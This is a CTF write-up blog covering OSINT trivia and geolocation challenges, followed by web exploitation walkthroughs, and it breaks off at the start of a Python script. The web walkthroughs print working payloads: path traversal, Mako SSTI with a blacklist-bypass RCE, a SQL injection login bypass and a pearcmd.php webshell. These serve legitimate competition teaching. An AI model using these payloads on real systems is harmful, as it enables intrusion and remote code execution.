What’s up, hackers! 👋

I’m back with a write-up series for CAT CTF 2026. This competition was a legendary experience for me. Despite playing SOLO against some heavy-hitting teams, I managed to fight my way up and secure 4th Place overall! 🏆

It was a test of endurance, speed, and precision. Playing solo means you are the lead investigator, the web expert, and the forensic analyst all at once. The grind was real, but the result feels even better.

🚀 Performance Highlights:

• The OSINT Gauntlet: I cleared 4 out of 5 OSINT challenges. I was on a roll, but the clock was my only enemy—I simply ran out of time before I could wrap up the final one.

• First Blood 🩸: I managed to snag the First Solve on 2 of those OSINT challenges.

I want to give a massive shout-out to all the authors for these creative and high-quality challenges. They kept me on the edge of my seat from start to finish.

Enough with the talk—it’s time to get technical. We’re going to dive deep into my favorite playground. Let’s start the series with the OSINT walkthroughs!

🕵️‍♂️ OSINT Series: Who Will Win the Million?

Today I’m sharing a special write-up for a OSINT challenge that was easy. I managed to snag the First Blood (First Solve) 🩸.

It was a trivia-style survival game where you had to answer 12 OSINT questions in a row. One typo, one wrong date, or one wrong format, and the connection drops. It’s all about precision and fast “Google Dorking” skills.

Below is the full walkthrough of how I hunted down the answers and secured the flag.

Author: 0x2face

Points: 100

📝 The Challenge Description

nc 178.62.202.60 8080

🔍 Phase 1: The Connection

Connecting to the server gives us a cool ASCII art intro. I chose option 1 to start the hunt.

🚇 Phase 2: The 12 Questions Walkthrough

1. Microsoft Hafnium Attack

• Question: What is the date Microsoft disclosed the exchange server hafnium attack?

• Format: DD-MM-YYYY

• Search: “Microsoft exchange server hafnium disclosure date”

• Answer: 02-03-2021

• Reference: Talos Intelligence

2. Yahoo Data Breach

• Question: What is the date of the data breach of the 500m accounts of yahoo?

• Format: DD-MM-YYYY

• Search: “Yahoo 500 million accounts breach date”

• Answer: 22-09-2016

• Reference: Wikipedia

3. The Silk Road

• Question: What is the real name of the founder of the silk road dark web marketplace?

• Format: Fname_Lname

• Search: “Silk Road marketplace founder”

• Answer: Ross_Ulbricht

• Reference: Wikipedia

4. LulzSec Leader “Sabu”

• Question: What is the real name of the hacker known as “Sabu” who was a leader of lulzsec?

• Format: Fname_Lname

• Search: “Sabu hacker real name”

• Answer: Hector_Monsegur

• Reference: Wikipedia

5. Breach Forums Takedown

• Question: What is the real name of the person arrested in 2023 who was associated with owning and operating breach forums?

• Format: Fname_Lname

• Search: “Breach Forums owner arrest 2023”

• Answer: Conor_Fitzpatrick

• Reference: Department of Justice

6. The Condor

• Question: What is the real name of the individual known as “the condor” in early phone phreaking history?

• Format: Fname_Lname

• Search: “The Condor hacker real name”

• Answer: Kevin_Mitnick

• Reference: LA Times

7. WikiLeaks Founder

• Question: What is the name of the founder of wikileaks?

• Format: Fname_Lname

• Search: “Founder of WikiLeaks”

• Answer: Julian_Assange

• Reference: Wikipedia

8. Facebook Access Tokens

• Question: What is the date facebook announced the breach exposing 50m access tokens?

• Format: DD-MM-YYYY

• Search: “Facebook 50m access tokens breach announcement date”

• Answer: 28-09-2018

• Reference: BBC News

9. The Morris Worm

• Question: What is the name of the hacker who created the morris worm in 1988?

• Format: Fname_Lname

• Search: “Creator of Morris Worm 1988”

• Answer: Robert_Morris

• Reference: Okta Identity 101

10. Onion Routing Protocol

• Question: What is the name of the founder of the onion routing protocol?

• Format: Fname_Lname

• Search: “Inventor of onion routing”

• Answer: Paul_Syverson

• Reference: Wikipedia

11. eBay Data Breach

• Question: What is the date ebay disclosed its 145m user data breach?

• Format: DD-MM-YYYY

• Search: “eBay 145m data breach date”

• Answer: 21-05-2014

• Reference: Washington Post

12. LinkedIn Credential Breach

• Question: What is the date linkedin confirmed the massive credential breach?

• Format: DD-MM-YYYY

• Search: “LinkedIn 2016 breach confirmation date”

• Answer: 18-05-2016

• Reference: LinkedIn Help Center

🏁 Phase 3: Extraction

After getting through the gauntlet of questions, the “Millionaire” prompt finally changed! I was given the option to finally claim the prize.

“Congrats! You finished our OSINT questions and deserve the flag :)”

I selected 1- get the flag and got the final payload.

Flag: CATF{0S1NT_1S_C00L_1F_U_KN0W_H0W_T0_USE_Y0UR_SE3RCH_SK11LS_W3LL}

==============================================

🕵️‍♂️ OSINT Series: Murder

This was the second OSINT challenge I tackled in CAT CTF 2026. This one wasn’t just about quick searching; it was about Criminal Profiling and connecting the dots of a real-life dark story. I had to dive deep into a famous criminal case to extract the fragments needed for the flag.

Author: 0x2face

Points: 100

📝 The Challenge Description

The house stood in unnatural silence that night—its walls still holding the echoes of a life meticulously controlled, suffocatingly perfect. Behind its polished exterior lived a daughter sculpted by expectation, her existence measured in grades, obedience, and illusion. Yet beneath that fragile perfection, something festered—quiet, patient, and irreversible.

On a cold November evening, the illusion did not crack—it collapsed.

What followed was not the chaos of madness, but the precision of something long rehearsed. A life built on deception had reached its breaking point, and when reality threatened to expose her carefully woven lies, she chose a darker permanence. Love, forbidden and obsessive, became both her refuge… and her weapon.

Somewhere in the shadows, a lover—equally entangled in her web—became the first thread you must follow. Find his name, the one she risked everything for, the one who stood behind the curtain of her fabricated life. That is your first fragment. (Fname_Lname)

But devotion alone could not stain the night with blood. A signal was exchanged—calculated, deliberate. A message reading “VIP Access” was sent not as courtesy, but as confirmation that the front door would be opened from within. Moments later, a call pierced the silence at precisely the right time, drawing her downstairs to fulfill her role. Trace the man who crossed the threshold—the one who answered that signal and stepped inside when the door unlocked. That identity is your second fragment. (Fname_Lname)

Between desire and execution, however, stood a broker of shadows—a man who hid behind the alias “Homeboy.” But shadows always belong to something real. Beneath that street-born name lies a true identity—one tied directly to the orchestration of what followed. Unmask him. Find the name he was born with, not the one whispered in the dark, and you will claim the third fragment. (Fname_Lname)

And finally… the lie that helped sustain her illusion long before the night of blood. She spoke of compassion, of purpose—of days spent aiding the vulnerable, walking the halls of a place devoted to healing. But like everything else, this too was a fabrication. Trace this false story to its source, uncover the name of the institution she claimed to serve, and you will obtain the final fragment. (xxx_xxxxxxx_xxx_xxxx_xxxxxxxx)

Piece them together, and the truth—long buried beneath obedience, deception, and blood—will emerge from the silence.

Flag format: CATF{Fname_Lname_Fname_Lname_Fname_Lname_xxx_xxxxxxxx_xxx_xxxx_xxxxxxxx}

---

The description was a long, cinematic narrative about a daughter living a “fabricated life,” a “cold November evening,” and a “broken illusion.” It mentioned:

• A daughter pressured by high expectations.

• A forbidden lover.

• A signal message: “VIP Access”.

• An accomplice alias: “Homeboy”.

• A fake story about volunteering at a specific hospital.

🔍 Step 1: Identifying the Case (The Core)

The narrative was very specific. I started by searching for the most unique keywords from the description to find the story.

Search Query: "VIP Access" message "Homeboy" "November" daughter murder

The Discovery:

The search results led me to this link:

• Reference: Jennifer Pan: The Girl Who Unlocked the Front Door

This confirmed that the story is about Jennifer Pan, a Canadian woman who orchestrated a hit on her parents in 2010.

🧩 Step 2: Extracting the Fragments

Now that the target was identified, I had to hunt for the 4 fragments.

Fragment 1: The Forbidden Lover

The challenge asked for the lover she risked everything for.

Search Query: Jennifer Pan boyfriend name

I found this article:

• Reference: Jennifer Pan’s ex-boyfriend Daniel Wong

Fragment 1: Daniel_Wong

Fragment 2: The Man who Crossed the Threshold

The description mentioned a “VIP Access” signal and a man who entered when the door unlocked.

Search Query: Jennifer Pan "VIP Access" message hitman name

This led me to a TIME article:

• Reference: What to know about Jennifer Pan

The article mentioned her co-conspirators: Lenford Crawford and David Mylvaganam. Specifically, David was the one associated with the execution of the plan on the ground.

Fragment 2: David_Mylvaganam

Fragment 3: Unmasking “Homeboy”

I needed the real name behind the street alias “Homeboy.”

Search Query: Jennifer Pan accomplice alias Homeboy real name

I found this Yahoo Entertainment link:

• Reference: Lenford Crawford found guilty of conspiring

The article confirms that Lenford Crawford is indeed “Homeboy.”

Fragment 3: Lenford_Crawford

Fragment 4: The Fake Institution

The last part was the name of the hospital she claimed to volunteer at to keep her lie alive.

Search Query: Jennifer Pan fake volunteer hospital

This CBC News article gave me the exact name:

• Reference: Court orders new murder trial for Jennifer Pan

Fragment 4: the_hospital_for_sick_children

🏁 Phase 3: Final Flag Construction

Piece them all together in order: CATF{F1_F2_F3_F4}

Final Flag: CATF{Daniel_Wong_David_Mylvaganam_Lenford_Crawford_the_hospital_for_sick_children}

==============================================

🕵️‍♂️ OSINT Series: Murder 2

This was the sequel to the “Murder” challenge, and it was even darker. It tells the story of a man who lived a total lie for 18 years, pretending to be a successful doctor at the WHO while he was actually doing nothing. When his lie was about to be exposed, he chose a path of blood.

Author: 0x2face

Points: 100

📝 The Challenge Description

The man did not live a double life—he lived no life at all.

For nearly two decades, he moved through the world as someone he was not, wrapped in credentials never earned and a career that existed only in conversation. Each morning, he left home with purpose, only to disappear into hours that belonged to no institution, no colleagues, no reality. To those around him, he was accomplished, respected—untouchable. But beneath that carefully sustained illusion was nothing but silence… and time running out.

Somewhere near the border between nations, a woman became part of that illusion. She believed in his status, his influence, his promises of opportunity. What began as trust slowly transformed into exploitation, as a large sum of money was handed over under the guise of investment—money that was never returned. The town where she lived, where deception took a more personal form, is where your investigation begins. That location is your first fragment. (xxxxxx-xxxxxxxx)

But long before everything collapsed, there was a moment—quiet, almost forgettable—where something didn’t quite align. A fall. A witness. A voice that tried to speak before it was silenced. Officially, it was ruled an accident. Unofficially… it left questions unanswered. You are looking for the exact date on which this incident occurred. That is your second fragment. (DD-MM-YYYY)

Years later, the illusion reached its breaking point.

What followed was not sudden madness, but something far more controlled. A sequence of actions carried out with disturbing calm—routine masking intent. By morning, everything had changed. Those closest to him, the ones who unknowingly stood closest to the truth, became part of its erasure. Identify the date on which his children were killed. That moment forms your third fragment. (DD-MM-YYYY)

In the end, the truth surfaced—as it always does.

A trial dismantled the persona piece by piece, exposing not just the crimes, but the years of fabrication behind them. He was sentenced, imprisoned, and removed from the life he had pretended to live. Yet even within confinement, time continued forward. Eventually, a threshold was reached—the moment he first became eligible to walk free again. That year is your final fragment. (YYYY)

Piece them together, and the illusion—once so carefully constructed—will collapse into clarity.

flag format : CATF{Xxxxxx-Xxxxxxxx_DD-MM-YYYY_DD-MM-YYYY_YYYY}

The description was a chilling summary of a man who “lived no life at all”:

• Pretended to have a career for 20 years.

• A woman near the border was scammed for a large sum of money.

• A “fall” of a witness that was ruled an accident.

• The murder of his children.

• The year he became eligible for parole (walk free again).

🔍 Step 1: Identifying the “Legendary” Liar

I started by searching for the most unique part of the story: a man pretending to be a doctor for nearly 20 years and working for the WHO.

Search Query: man pretended to be a doctor for 18 years WHO murder family

The Discovery:

The search results immediately pointed to Jean-Claude Romand.

• Reference: Wikipedia - Jean-Claude Romand

From the Wikipedia entry, I confirmed the suspect is Jean-Claude Romand, who lied about his career for 18 years.

🧩 Step 2: Extracting the Fragments

Now that the case was confirmed, I used the same Wikipedia source to hunt for the 4 fragments.

Fragment 1: The Town near the Border

The description mentioned a town near the border where he lived and where the deception took place.

• Investigation: Checking his biography on Wikipedia, it was clear where he was based.

• Result: He lived in Ferney-Voltaire, a French town right on the border with Switzerland (near Geneva).

• Format: Ferney-Voltaire

Fragment 2: The “Accidental” Fall

The description mentioned a fall of a witness that was officially ruled an accident.

• Investigation: I looked into the deaths associated with him before the main murders. I found the incident involving his father-in-law.

• Evidence: “Jean-Claude Romand was the only witness to the death of his father-in-law, Pierre Crolet, on 23 October 1988.”

• Format: 23-10-1988

Fragment 3: The Day the Children Died

I needed the exact date his children were killed during the final collapse of his illusion.

• Investigation: According to the timeline of the murders, after killing his wife, he killed his children the next morning.

• Evidence: Wikipedia confirms the murders of his children (Caroline and Antoine) occurred on 10 January 1993.

• Format: 10-01-1993

Fragment 4: The Threshold of Freedom (Parole)

The final piece was the year he first became eligible to walk free (parole eligibility).

• Investigation: I looked at his sentencing details.

• Evidence: “On 6 July 1996, Romand was found guilty and sentenced to life imprisonment… he became eligible for parole in 2015.”

• Format: 2015

🏁 Phase 3: Final Flag Construction

Piece them together as per the format: CATF{Xxxxxx-Xxxxxxxx_DD-MM-YYYY_DD-MM-YYYY_YYYY}

Final Flag: CATF{Ferney-Voltaire_23-10-1988_10-01-1993_2015}

=================================

🕵️‍♂️ OSINT Series: P-P-PP-Park?

This was the fourth OSINT challenge I tackled in CAT CTF 26. This one was a pure test of Visual Forensics and patience. I was dropped into a massive water park with no context other than a cryptic plea for help.

To solve this, I had to travel halfway across the world digitally, deciphering signs and searching for the exact “sub-park” hidden within a giant amusement complex.

Author: ELJoOker

Points: 493

📝 The Challenge Description

“Idk where am I, or how did I get here. can you please take me home?”

Flag Format: CATF{Location_name}

🔍 Step 1: Visual Cues & Initial Reconnaissance

The investigation started with a deep analysis of the provided photo. At first glance, it was just a typical, albeit massive, water park. However, looking closely at the background structures and distant signs, I noticed Chinese characters.

This was my first major lead: the location had to be in China.

Search Strategy: I used a Reverse Image Search focusing on the most unique architecture in the park (the colorful slides and the castle-like buildings). I added the keyword China to refine the results.

The Discovery: The search results quickly pointed to a destination called Royal Ocean World located in Shenyang, China.

Investigator’s Note: While I found the main park, the flag required the specific Location_name, and Royal Ocean World is an umbrella name for several smaller theme parks.

🧩 Step 2: Finding the Specific “Fragment”

I needed to find the exact name of the water park section shown in the photo. I spent a long time searching for different angles of the park.

During my search, I found a low-quality photo where I could just barely make out the word “Hawaii” on a sign, but the rest of the text was obscured by the angle.

Refining the Search: I used a targeted query to confirm the divisions within Royal Ocean World: Search Query: royal ocean world "hawaii"

I hit gold with this travel guide:

• Reference: Triphobo - Things to do in Shenyang

Evidence: The site listed the attractions: “The Royal Ocean World is a themed family park consisting of three exclusive attractions. The Hawaii Water Park has rides and water tubes while Narnia and Aquarium boast of fantasy themes.”

📸 Step 3: Final Confirmation

To ensure the flag was formatted correctly, I needed a clear shot of the entrance or the official name used on-site. I found an image archive from a travel site that showed the exact gate of the section.

• Reference: Royal Ocean World Image Archive

The photo clearly showed the branding for the Hawaii Water Park.

🏁 Phase 3: Final Flag Construction

The challenge asked for the Location_name in a specific format. Based on the evidence from the park’s internal divisions:

Final Flag: CATF{Hawaii_Water_Park}

What’s up, hackers! 👋

it’s time to dive into my primary category: Web Exploitation. 🕸️

As a solo player, the Web category was a massive battlefield. Out of the 10 challenges available, I managed to clear 6 of them. Even with the intense competition, I secured Second Blood 🥈 on one challenge and Third Blood 🥉 on another.

Web challenges are all about understanding how a developer thinks—and then finding where they got a bit too comfortable.

Let’s kick off the Web series with a challenge that was literally a “headache”—until I realized the answer was right in front of me.

🕸️ Web Series: Headache

Author: 0xdblm
Points: 100

📝 The Challenge Description

“Headache”

 URL: http://167.99.34.2:5000/

Upon visiting the home page, I was greeted with an “Internal Gateway” message:

• Status: Request rejected.

• Hint: “Try again with less body.”

• Options: Get Flag

  Admin Portal.

🔍 Phase 1: Initial Discovery

When I clicked on the “Get Flag” button, it redirected me to /api/flag. Instead of the flag, I received a cold JSON response:

🧪 Phase 2: Analyzing the API (Burp Suite)

I intercepted the request to /api/flag using Burp Suite to see exactly what was happening under the hood.

The Request:

GET /api/flag HTTP/1.1
Host: 167.99.34.2:5000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) ...
Referer: http://167.99.34.2:5000/
Connection: keep-alive 

The Response:

HTTP/1.1 403 FORBIDDEN
Server: Werkzeug/2.3.0 Python/3.11.15
Content-Type: application/json
Content-Length: 75

{"error":"admin_only","message":"Missing elevated authorization context."}

The server was running Werkzeug, a common WSGI web application library for Python. The 403 Forbidden status confirmed that the standard GET request was being blocked by an authorization check.

💡 Phase 3: The Exploit (Using your HEAD)

I went back to the hint on the homepage: “Try again with less body.”

In HTTP, a GET request can have a body, but a HEAD request is identical to a GET request except that the server must not return a message-body in the response. It only returns the headers.

If the developer implemented the “Admin Only” check only for GET and POST methods, a HEAD request might bypass the security filter entirely.

The Attack: I changed the request method from GET to HEAD in Burp Repeater.

HEAD /api/flag HTTP/1.1
Host: 167.99.34.2:5000
... 

The Response:

HTTP/1.1 200 OK
Server: Werkzeug/2.3.0 Python/3.11.15
Date: Tue, 24 Mar 2026 03:14:35 GMT
Content-Type: application/json
X-Flag: CATF{M4Yb3_Us1ng_y0ur_H34D_1S_us3full}
Cache-Control: no-store
Content-Length: 0
Connection: close

Success! By switching to the HEAD method, the server bypassed the authorization logic and served the flag directly in a custom HTTP header: X-Flag.

🏁 The Flag

The pun in the flag confirmed the intended solution:

Final Flag: CATF{M4Yb3_Us1ng_y0ur_H34D_1S_us3full}

==========================================================

🕸️ Web Series: Admin Jokes

Welcome to the second web challenge in this series. This one required chaining a few classic web vulnerabilities together: starting with an LFI (Local File Inclusion) to leak the source code, discovering a hidden endpoint, and ultimately exploiting an SSTI (Server-Side Template Injection) while bypassing a security filter to get an RCE (Remote Code Execution).

Author: 0xdblm

Points: 100

📝 The Challenge Description

“Admin is a wise man; he doesn’t say silly jokes.”

URL: http://167.99.34.2:5008/

Upon entering the site, I found a simple homepage for an “Admin Jokes Portal.”

It had a link pointing to: http://167.99.34.2:5008/jokes?joke=1 Visiting this link displayed a basic joke about internal server errors.

🔍 Phase 1: LFI & Directory Traversal

My first instinct was to test the joke parameter for IDOR (Insecure Direct Object Reference) by changing the number. I manually enumerated the values and found that valid jokes existed from joke=1 up to joke=6. However, when I hit ?joke=7 (and anything above it), the server returned a “Not Found” error.

Next, I tested for Path Traversal / LFI by inserting a classic payload: http://167.99.34.2:5008/jokes?joke=../../../../../../../../../../../

The Result: Boom! The application listed the entire root directory of the Linux filesystem.

The listing showed some interesting files and directories: .dockerenv, app, etc, flag.txt, readflagbinary, root, tmp, etc.

I immediately tried to read the flag: ?joke=../../../../../../../../../../../flag.txt

But the author was trolling:

“CATF{Fake_Flag_Try_Harder_Buddy} hahahaha nice try! Hint: You need an RCE…. and look somewhere for the real flag.”

The most interesting file was /readflagbinary. However, trying to read it via the browser resulted in an Internal Server Error because it’s an executable binary, not a text file. I needed an RCE to execute it.

🧩 Phase 2: Source Code Review via /proc/self/cwd

To get an RCE, I needed to understand how the backend worked. Since I had LFI, I used a well-known Linux trick to read the source code of the running application.

By navigating to /proc/self/cwd/, which points to the Current Working Directory of the running process, I could read the main Python file: http://167.99.34.2:5008/jokes?joke=../../../../../../../../../../../proc/self/cwd/app.py

I extracted the source code. Here is the most critical part of the application logic:

from mako.template import Template
import os

BLACKLIST = ["os", "system", "eval", "popen", "subprocess"]

# ... (other routes) ...

@app.route("/admin/profile")
def admin_profile():
    name = request.args.get("name", "Admin")
    lowered = name.lower()
    
    if any(token in lowered for token in BLACKLIST):
        return "Blocked by security filter.", 403

    template = Template(f"<h2>Admin Profile</h2><p>Welcome, {name}</p>")
    return template.render() 

💻 Phase 3: Exploiting SSTI (Server-Side Template Injection)

From the source code, two things were immediately obvious:

1. The Template Engine: The app uses mako.template.Template.

2. The Vulnerability: The name parameter in the /admin/profile route is directly concatenated into the template string Template(f"...{name}...") before rendering. This is a classic SSTI vulnerability.

1. Proof of Concept (PoC)

I navigated to the hidden endpoint and tested a basic Mako SSTI payload: GET admin/profile?name=${7*7}

The Response:

HTTP/1.1 200 OK
Admin Profile 
Welcome, 49

The math executed! The SSTI was confirmed.

2. Bypassing the Blacklist for RCE

To read the flag, I needed to execute the /readflagbinary file. However, the developer implemented a blacklist: BLACKLIST = ["os", "system", "eval", "popen", "subprocess"]

I couldn’t just use standard Python OS commands because the name.lower() check would block them.

The Bypass: I crafted a payload using string concatenation inside the template execution block. By breaking the banned words into smaller strings and adding them together, I bypassed the filter.

'o'+'s' avoids the "os" filter. 'po'+'pen' avoids the "popen" filter.

The Final Payload: ${__import__('o'+'s').__dict__['po'+'pen']('/readflagbinary').read()}

🏁 Phase 4: Getting the Flag

I sent the final crafted payload via Burp Suite to execute the binary:

Request:

GET admin/profile?name=${__import__('o'+'s').__dict__['po'+'pen']('/readflagbinary').read()} HTTP/1.1
Host: 167.99.34.2:5008
Connection: keep-alive 

Response:

HTTP/1.1 200 OK
Server: Werkzeug/3.1.6 Python/3.12.13
Date: Tue, 24 Mar 2026 17:10:11 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 87
Connection: close

<h2>Admin Profile</h2><p>Welcome, CATF{Mak0_LF1_2_SSTI_Adm1n_J0k3s_Pwn3d_9f4e2b7c}</p>

Final Flag: CATF{Mak0_LF1_2_SSTI_Adm1n_J0k3s_Pwn3d_9f4e2b7c}

==================================================================

🕸️ Web Series: Easy Injection

Moving on to the next Web challenge! As the name implies, “Easy Injection” was a straightforward challenge, This challenge was all about understanding the logic of authentication flows and exploiting improper input sanitization.

Author: 0xdblm

Points: 100

📝 The Challenge Description

URL: http://167.99.34.2:5777

The homepage presented a standard portal with options to Register and Login. Standard users can create accounts, but administrative tools are restricted to staff members with elevated access.

🔍 Phase 1: Recon & Standard Access

My first step was to play by the rules to see what a normal user can access. I went to the Register page and created a standard account with my signature credentials:

• Username: 0xaskar

• Password: 0xaskar

After logging in, I was redirected to the user Dashboard. The dashboard confirmed my standard access and clearly stated:

Account Status User workspace access: active Administrative tools: restricted

There was a link pointing to a separate “Administrative Login” screen. That was my actual target.

💻 Phase 2: The Admin Portal & SQLi

I navigated to the Administrative Login page. It was a restricted area asking for an Admin Username and Password. The placeholder for the username explicitly hinted at admin.

The Vulnerability: Whenever I see a custom login form, my first instinct is to test for SQL Injection (SQLi). If the backend doesn’t sanitize the inputs and directly concatenates them into a SQL query, we can manipulate the logic to bypass the password check entirely.

A typical backend query looks something like this:

SQL

SELECT * FROM users WHERE username = 'USER_INPUT' AND password = 'PASSWORD_INPUT'; 

💣 Phase 3: The Exploit (Auth Bypass)

I decided to use a classic SQLi payload in the Admin Username field to comment out the rest of the query (specifically, the password verification part).

The Payload:

• Admin Username: admin' --

• Admin Password: 0xaskar (or literally any random string)

Why it works: By injecting admin' --, the backend query transforms into:

SQL

SELECT * FROM users WHERE username = 'admin' --' AND password = '0xaskar'; 

The -- turns the rest of the line into a comment in SQL. The database only executes SELECT * FROM users WHERE username = 'admin', logs me in as the admin, and completely ignores whatever password I typed!

🏁 Phase 4: Getting the Flag

The exploit worked flawlessly. The authentication was bypassed, and I was granted access to the Administration Panel.

Final Flag: CATF{E4SY_e4sy_Easy_1nj3c410n}

🕸️ Web Series: I love PHP

This challenge was a real treat for PHP lovers (and haters). The title says it all, and the description gave a huge hint: “PHP is a weird way to spell RCE.” It started as a simple file inclusion and turned into a full Remote Code Execution (RCE) using a clever trick with the PHP PEAR management tool.

Author: marco

Points: 244

📝 The Challenge Description

“PHP is a weird way to spell RCE”

URL: http://167.99.34.2:8888/

Upon visiting the homepage, the source code was displayed directly:

<?php $file = $_GET['file'] ?? null; if ($file) { if (strpos($file, 'file://') === 0) { include($file); } } else { highlight_file(__FILE__); }

🔍 Phase 1: Initial Discovery & Failed Attempts

The code has a clear Local File Inclusion (LFI) vulnerability via the include($file) function. However, the path must start with file://.

My Failed Attempts:

1. PHP Filters: I tried file://php://filter/... to read files, but it failed because PHP interpreted it as a literal local path rather than a wrapper.

2. Log Poisoning: I attempted to reach standard log paths (Nginx/Apache), but they were inaccessible or didn’t exist.

💡 Phase 2: The Exploit (Pearcmd.php RCE)

Remembering the “RCE” hint, I focused on a powerful technique: exploiting pearcmd.php.

In many PHP Docker environments, PEAR is installed at /usr/local/lib/php/pearcmd.php. If register_argc_argv is enabled, we can pass command-line arguments via the URL.

The Attack Plan:

Use the config-create command in PEAR to write a custom PHP WebShell into the /tmp/ directory.

The “Golden” Payload:

I used curl with the -g (globoff) flag to ensure the brackets and PHP tags were sent exactly as written.

Command:

curl -g -v "[http://167.99.34.2:8888/?+config-create+/&file=file:///usr/local/lib/php/pearcmd.php&/](http://167.99.34.2:8888/?+config-create+/&file=file:///usr/local/lib/php/pearcmd.php&/)+/tmp/0xaskar.php" 

The server responded with: Successfully created default configuration file "/tmp/0xaskar.php"

🏁 Phase 3: Command Execution & Flag

Now that my shell /tmp/0xaskar.php was created, I used the original LFI vulnerability to execute it.

1. Listing Directory Contents

By navigating to: http://167.99.34.2:8888/?file=file:///tmp/0xaskar.php&1=ls -la /

The output showed the raw PEAR configuration file, but hidden inside the strings was the output of my ls command! I found an interesting SUID binary:

-rwsr-xr-x 1 root root 14336 Mar 21 22:50 readflag 

2. The Final Blow

I executed the binary to read the flag: http://167.99.34.2:8888/?file=file:///tmp/0xaskar.php&1=/readflag

The flag appeared multiple times within the PEAR configuration output:

Response Snippet:

.../&file=file:/usr/local/lib/php/pearcmd.php&/CATF{TH3_M05T_TH1NG_1_L0V3_AB0UT_PHP_15_TH4T_H0W3V3R_SM4LL_TH3_C0D3_15_Y0U_C4N_ALW4Y5_G3T_4N_RCE}...

Final Flag: CATF{TH3_M05T_TH1NG_1_L0V3_AB0UT_PHP_15_TH4T_H0W3V3R_SM4LL_TH3_C0D3_15_Y0U_C4N_ALW4Y5_G3T_4N_RCE}

=================================================

🕸️ Web Series: JSF

Author: 0xdblm

Points: 244

📝 The Challenge Description

“I hate client-side, do you?”

URL: http://167.99.34.2:5888/

Upon opening the URL, I was greeted with a “JSF Support Portal.” It looked like a standard dashboard showing account overview, open cases, and a workspace status. Everything appeared static—no buttons to click, and no hidden links in plain sight.

🔍 Phase 1: Reconnaissance

1. The Basics

I checked /robots.txt but it was a dead end:

` User-agent: * Allow: /`

2. Deep Dive into Source Code

I viewed the page source (Ctrl+U). At the bottom of the HTML, I noticed an unusual script tag:

Navigating to /legacy-widget.js, I found a massive wall of symbols: [][(![]+[])[+!+[]].... This is JSFuck, an esoteric and educational programming style where JavaScript code is written using only six characters: [ ] ( ) ! +.

💡 Phase 2: Decoding the Madness

I took the JSFuck payload to a decoder (like dcode.fr). The decoded logic was eye-opening:

JavaScript

(function () {
    var statusEl = document.getElementById("ops-status");
    // ... UI Updates ...
    var cookieMatch = document.cookie.match(/(?:^|; )widget_ticket=([^;]+)/);
    var ticket = cookieMatch ? decodeURIComponent(cookieMatch[1]) : "";
    
    window.setTimeout(async function () {
        try {
            var response = await window.fetch("/api/legacy-assistant", {
                method: "POST",
                credentials: "same-origin",
                headers: { "X-Widget-Ticket": ticket } // The key!
            });
            var payload = await response.json();
            window.alert(payload.flag);
        } catch (error) {
            window.alert("Legacy assistant failed to initialize.");
        }
    }, 180);
})() 

The Logic Break-down:

1. The script looks for a cookie named widget_ticket.

2. It sends a POST request to the endpoint /api/legacy-assistant.

3. Crucially, it includes a custom header: X-Widget-Ticket: [Cookie Value].

4. If successful, the flag is returned in the JSON response.

🏁 Phase 3: The Exploit

There are two ways to solve this: the “Automated” way via Python, or the “Manual” way via Burp Suite.

Method A: Python Automation

We can use a script to handle the session, cookies, and headers in one go:

import requests

session = requests.Session()
session.get("[http://167.99.34.2:5888/](http://167.99.34.2:5888/)") # Get the cookie
ticket = session.cookies.get("widget_ticket")

headers = {"X-Widget-Ticket": ticket}
api_resp = session.post("[http://167.99.34.2:5888/api/legacy-assistant](http://167.99.34.2:5888/api/legacy-assistant)", headers=headers)

print(api_resp.text)

Method B: Manual Exploitation (Burp Suite)

If you prefer manual control or don’t want to write code, you can use Burp Suite.

🛠️ Key Modifications:

1. Change Method: Change the request from GET to POST.

2. Add Custom Header: Add the X-Widget-Ticket header with the value from your cookie.

The Final Request in Burp Suite:

POST /api/legacy-assistant HTTP/1.1
Host: 167.99.34.2:5888
User-Agent: Mozilla/5.0 (Windows NT 10.0; ...)
Cookie: widget_ticket=93ttjUt-U5dOtLAwnon_YMUgbkwBTrbZ; session=eyJ3aWR...
X-Widget-Ticket: 93ttjUt-U5dOtLAwnon_YMUgbkwBTrbZ
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0 

The Response:

HTTP/1.1 200 OK
Content-Type: application/json
...

{"flag":"CATF{Y0u_kn3w_th3_0bfusc1710n_S3cr3t}"}

Final Flag: CATF{Y0u_kn3w_th3_0bfusc1710n_S3cr3t}

==========================================================

🕸️Web Series: Forest Secrets

Author: 0xdblm

Points: 493

Solves: 3 

📝 The Challenge Description

“You awaken in the heart of a forest that feels ancient, hostile, and very much alive. Strange voices drift through the trees, unseen eyes follow every movement, and each path seems to lead deeper into something you were never meant to find. If there is a way out, it is buried beneath the forest’s silence.”

URL: http://167.99.34.2:5050/

Upon opening the URL, I was greeted with a text-based terminal interface. The atmosphere was dark and mysterious, providing a few lines of lore and a prompt to type start to begin the journey.

🔍 Phase 1: Reconnaissance

1. Initial Interaction

When I typed start, the game presented four routes:

• HEAD TOWARD THE LANTERN LIGHT

• CALL INTO THE FOG

• CLIMB THE WATCHTOWER

• HIDE BENEATH THE ROOTS

2. Deep Dive into Source Code

I checked the page source and found a script tag: <script src="/static/main.js" defer></script>

Navigating to /static/main.js, I analyzed the core game logic. The script handles terminal rendering, audio, and, most importantly, the communication with the backend APIs:

• GET /api/options: Fetches the available commands for each stage.

• POST /api/monitor: Sends the user’s command to the server for validation.

• POST /api/reset: Resets the game state.

The game tracks progress via a cookie named trail_id.

🗺️ Phase 2: Mapping the API

To understand all possible moves, I intercepted the request to /api/options using Burp Suite:

Request:

GET /api/options HTTP/1.1
Host: 167.99.34.2:5050
...

Response:

{
  "allPossibleCommands": {
    "1": ["HEAD TOWARD THE LANTERN LIGHT", "CALL INTO THE FOG", "CLIMB THE WATCHTOWER", "HIDE BENEATH THE ROOTS"],
    "2": ["ENTER THE ABANDONED SHRINE", "FOLLOW THE DRIPPING TUNNEL", "KNOCK ON THE STONE DOOR", "TURN BACK"],
    "3": ["READ THE CARVED TABLET", "SET UP CAMP", "DRINK FROM THE WELL", "RETRACE YOUR STEPS"],
    "4": ["OPEN THE IRON GATE", "LIGHT A SIGNAL FIRE", "CHASE THE WHISPER", "WAIT FOR DAWN"]
  },
  "intro": "The forest is waiting. Four routes stand open before you."
}

🛠️ Phase 3: Automated Pathfinding

Instead of manual guessing, I wrote a Python script to automate the journey. The script handles the trail_id session cookie and iterates through the options until it hits a progression or a “gate”.

0xaskar_forest.py:

Python

import requests

